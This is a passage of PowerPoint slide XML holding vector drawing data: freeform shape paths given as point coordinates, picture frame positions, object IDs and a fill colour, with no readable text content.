                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023761" y="144269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016132" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010029" y="129083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002400" y="121490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994772" y="115415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987143" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968835" y="95673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930691" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868137" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857457" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837622" y="65300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819314" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801005" y="72894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782696" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749130" y="92636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735399" y="103266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720141" y="113897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704884" y="89599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695730" y="78968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686576" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665215" y="48596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653010" y="39484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639278" y="30372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625547" y="24298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613341" y="18223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598083" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584352" y="7593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569095" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538580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79BD3B2A-5FEE-0EB0-BE8A-B1DD2A982CE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9443" y="3012817"/>
              <a:ext cx="1209899" cy="754757"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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B300876E-D237-849F-19A5-6E1EEC8678F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9774" y="2984329"/>
              <a:ext cx="1303009" cy="839470"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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6F99BD2A-032C-C3B6-D47D-210BA0D91C50}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6355039" y="2170287"/>
              <a:ext cx="86360" cy="466725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="86360" h="466725">
                  <a:moveTo>
                    <a:pt x="19631" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64934" y="454558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86075" y="466599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19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4" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{740C78CF-3096-8C02-BA8B-735A0C9A1AC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0140" y="2067936"/>
              <a:ext cx="662932" cy="565939"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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9C84F9DF-3F93-FDE2-05BE-32564F4EA1AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6365005" y="2062678"/>
              <a:ext cx="673735" cy="576580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="602388" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="105421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70805" y="576433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105039" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73826" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10384" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35161" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594112" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603275" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602388" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="78392" y="565961"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73826" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78510" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="662923" y="465147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105039" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673201" y="472539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672747" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="667302" y="464391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="671980" y="464391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672747" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672093" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671980" y="464391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="603275" y="5920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="594112" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599388" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662810" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671980" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603275" y="5920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="9614" y="108451"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="10269" y="112807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10384" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="35161" y="108451"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35161" y="108451"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="594112" y="5920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="594681" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599388" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594112" y="592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83F3CE23-06BC-036E-6EA9-CB61F1F40262}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6430544" y="2125132"/>
              <a:ext cx="542290" cy="454659"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="542290" h="454660">
                  <a:moveTo>
                    <a:pt x="489271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="82783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54363" y="454558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542124" y="367258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489271" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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FDF66A07-579A-7A29-DB10-5B508D8B021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1115" y="2531526"/>
              <a:ext cx="880386" cy="237815"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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BC71A646-D396-CF98-7AC4-FE9F53BE9786}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6441848" y="2527070"/>
              <a:ext cx="592455" cy="111760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="592454" h="111760">
                  <a:moveTo>
                    <a:pt x="590439" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554" y="111255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592010" y="8910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59043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4A882292-13CA-62C8-C9B5-150C9DE68EAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524167" y="2548089"/>
              <a:ext cx="561975" cy="139065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="158559" y="124929"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114769" y="100850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93560" y="105333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49834" y="79768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43789" y="115900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64985" y="111417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108724" y="138468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158559" y="124929"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="170637" y="91808"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128358" y="66230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80035" y="81280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120802" y="102349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170637" y="91808"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="249161" y="75260"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="205371" y="52679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155536" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199326" y="88798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249161" y="75260"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="327685" y="60210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="283895" y="40640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234061" y="49669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277850" y="76758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327685" y="60210"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="404698" y="52679"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="357886" y="27089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308051" y="36118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353364" y="63220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404698" y="52679"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="481711" y="39128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436410" y="13550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388086" y="28600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433400" y="49669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481711" y="39128"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="561746" y="22580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="514934" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465112" y="12039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510413" y="36118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561746" y="22580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2037C30E-1DFB-CFF7-FA07-147BD68521CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6585118" y="2647338"/>
              <a:ext cx="101600" cy="41275"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="54061" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47537" y="40841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58214" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47376" y="37765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9239" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4689" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17322" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53588" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59348" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54061" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="48019" y="37590"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47376" y="37765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="93621" y="25194"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58214" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98498" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="97209" y="24219"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96985" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97096" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="98092" y="24219"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97096" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96985" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98498" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101599" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98092" y="24219"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="53094" y="2907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98092" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59841" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54934" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="4792" y="10847"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="7983" y="12821"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9239" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="17322" y="10847"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17322" y="10847"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="59348" y="2907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54934" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59841" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59348" y="290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066098DD-18F2-750E-3835-A4A98F25E4B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667629" y="2636887"/>
              <a:ext cx="93980" cy="38100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="93979" h="38100">
                  <a:moveTo>
                    <a:pt x="48323" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42282" y="37628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93625" y="27092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48323" y="0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332C13D6-E6C9-BE7E-9AF7-162154CB5AE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6663743" y="2635289"/>
              <a:ext cx="102235" cy="41275"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="52470" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="11437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45866" y="40823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59826" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45866" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8983" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4606" y="11437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16762" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51423" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57300" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52470" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="93407" y="27995"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45866" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60844" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98723" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="60844" y="37751"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59826" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60844" y="37751"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="97209" y="27215"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="97987" y="27215"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96830" y="29386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98723" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101619" y="29386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97987" y="27215"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="57300" y="2887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51423" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52531" y="3068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97987" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57300" y="2887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="4711" y="10867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
